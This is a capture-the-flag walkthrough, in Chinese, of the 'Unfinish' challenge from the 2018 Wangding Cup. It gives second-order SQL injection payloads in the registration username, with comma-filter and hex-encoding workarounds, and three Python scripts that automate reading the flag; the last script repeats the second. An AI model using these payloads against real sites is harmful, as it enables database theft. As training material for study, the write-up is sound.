[网鼎杯2018]Unfinish

0x01.前言

  • 过滤了逗号(,),截取子串时使用 from 1 for 10 的写法绕过

    [网鼎杯2018]Unfinish_html

  • 0'+hex编码要读取的信息+'0

要进行二次编码,只做一次编码时结果会被截断

[网鼎杯2018]Unfinish_safari_02

[网鼎杯2018]Unfinish_chrome_03

[网鼎杯2018]Unfinish_php_04

解法1

payload:0'+(select substr(hex(hex((select * from flag))) from 1 for 10))+'0

脚本

#coding:utf-8
import requests
import re
import time
from bs4 import BeautifulSoup
# Walkthrough script for the CTF instance named in url_reg / url_log below.
# Each round registers an account whose username field carries a SQL
# expression, logs in with that account, and prints the text of the first
# <span> in the page that comes back.
#
# NOTE(review): the server code is not visible here. A response that echoes
# the evaluated expression would mean the username reaches a SQL statement
# through string concatenation; the application-side fix is a parameterized
# query for every statement that stores or reads the username.
#
# Seen from the defending side, the traffic is distinctive: up to 100
# registrations about one second apart, sequential e-mail addresses, and quote
# characters plus SQL keywords inside the username field.

collected = ''  # never updated in this variant; each chunk is only printed

headers = {
    'User-Agent': "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36",
    # Referer points at an unrelated site and is sent as-is; nothing on this
    # page shows the target checking it.
    'Referer': "https://www.lagou.com/jobs/list_python/p-city_252?px=default&gx=%E5%85%A8%E8%81%8C&gj=&xl=%E6%9C%AC%E7%A7%91&isSchoolJob=1",
    'Accept': 'application/json, text/javascript, */*; q=0.01'
}
url_log = 'http://abf69fd1-7f0f-4127-ac0c-b8def3a0944f.node4.buuoj.cn:81/login.php'
url_reg = 'http://abf69fd1-7f0f-4127-ac0c-b8def3a0944f.node4.buuoj.cn:81/register.php'

# The write-up states that commas are filtered, hence the comma-free
# "from N for M" substring form, and that a single hex pass gets truncated,
# hence hex(hex(...)). Each round reads a 10-character window.
username_template = "0'+(select substr(hex(hex((select * from flag))) from {} for 10))+'0"
email_template = "11111231{}@qq.com"

for i in range(100):
    window_start = 1 + i * 10
    email = email_template.format(i)

    # One fresh account per window: the expression travels in "username".
    data_reg = {
        "email": email,
        "username": username_template.format(window_start),
        "password": "123",
    }
    data_log = {"email": email, "password": "123"}

    requests.post(url_reg, headers=headers, data=data_reg)
    time.sleep(1)
    login_page = requests.post(url_log, headers=headers, data=data_log)

    # The first <span> of the post-login page holds the value being read.
    first_span = BeautifulSoup(login_page.text, 'html.parser').find('span')
    print(first_span.text)

解法2

payload:0'+ascii(substr((select * from flag) from {} for 1))+'0

脚本

#coding:utf-8
import requests
import re
import time
from bs4 import BeautifulSoup
# Second variant of the walkthrough script: instead of hex-encoded windows it
# asks for ascii() of one character per round, so every printed value is a
# single character code. The flow is unchanged: register an account whose
# username carries the expression, log in, print the first <span>.
#
# NOTE(review): the server code is not visible here. If the post-login page
# echoes the evaluated expression, the username is being concatenated into a
# SQL statement; parameterized queries on both the write and the read path
# remove the issue.
#
# Detection angle: 99 registrations roughly one second apart, sequential
# e-mail addresses, and quotes plus SQL keywords in the username field.

collected = ''  # comma-separated character codes gathered so far

headers = {
    'User-Agent': "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36",
    # Referer is an unrelated URL sent as-is; nothing on this page shows the
    # target checking it.
    'Referer': "https://www.lagou.com/jobs/list_python/p-city_252?px=default&gx=%E5%85%A8%E8%81%8C&gj=&xl=%E6%9C%AC%E7%A7%91&isSchoolJob=1",
    'Accept': 'application/json, text/javascript, */*; q=0.01'
}
url_log = 'http://abf69fd1-7f0f-4127-ac0c-b8def3a0944f.node4.buuoj.cn:81/login.php'
url_reg = 'http://abf69fd1-7f0f-4127-ac0c-b8def3a0944f.node4.buuoj.cn:81/register.php'

# Comma-free substring form, because the write-up says commas are filtered.
username_template = "0'+ascii(substr((select * from flag) from {} for 1))+'0"
email_template = "111112{}@qq.com"

for i in range(1, 100):
    email = email_template.format(i)
    data_reg = {
        "email": email,
        "username": username_template.format(i),
        "password": "123",
    }
    data_log = {"email": email, "password": "123"}

    requests.post(url_reg, headers=headers, data=data_reg)
    time.sleep(1)
    login_page = requests.post(url_log, headers=headers, data=data_log)

    # The first <span> of the post-login page holds the value being read.
    value = BeautifulSoup(login_page.text, 'html.parser').find('span').text
    print(value)

    # Running list, printed every round; it starts with a leading comma.
    collected += ',' + value
    print(collected)
#coding:utf-8
import requests
import re
import time
from bs4 import BeautifulSoup
# This listing repeats the second script on the page line for line: one
# ascii() lookup per round, delivered through the username of a freshly
# registered account and read back from the first <span> after login.
#
# NOTE(review): the server code is not visible here. A post-login page that
# echoes the evaluated expression points at string-built SQL around the
# username; the remedy on the application side is parameterized queries.

collected = ''  # comma-separated character codes gathered so far

headers = dict([
    ('User-Agent', "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"),
    # Unrelated Referer sent as-is; the page does not show it being checked.
    ('Referer', "https://www.lagou.com/jobs/list_python/p-city_252?px=default&gx=%E5%85%A8%E8%81%8C&gj=&xl=%E6%9C%AC%E7%A7%91&isSchoolJob=1"),
    ('Accept', 'application/json, text/javascript, */*; q=0.01'),
])
url_log = 'http://abf69fd1-7f0f-4127-ac0c-b8def3a0944f.node4.buuoj.cn:81/login.php'
url_reg = 'http://abf69fd1-7f0f-4127-ac0c-b8def3a0944f.node4.buuoj.cn:81/register.php'

position = 1
while position < 100:
    # Comma-free "from N for 1" form; the write-up says commas are filtered.
    expression = "0'+ascii(substr((select * from flag) from {} for 1))+'0".format(position)
    account = "111112{}@qq.com".format(position)

    data_reg = {"email": account, "username": expression, "password": "123"}
    data_log = {"email": account, "password": "123"}

    requests.post(url_reg, headers=headers, data=data_reg)
    time.sleep(1)  # one-second gap between registering and logging in
    reply = requests.post(url_log, headers=headers, data=data_log)

    parsed = BeautifulSoup(reply.text, 'html.parser')
    code_text = parsed.span.text
    print(code_text)

    # Running list, printed every round; it starts with a leading comma.
    collected = ','.join([collected, code_text])
    print(collected)

    position += 1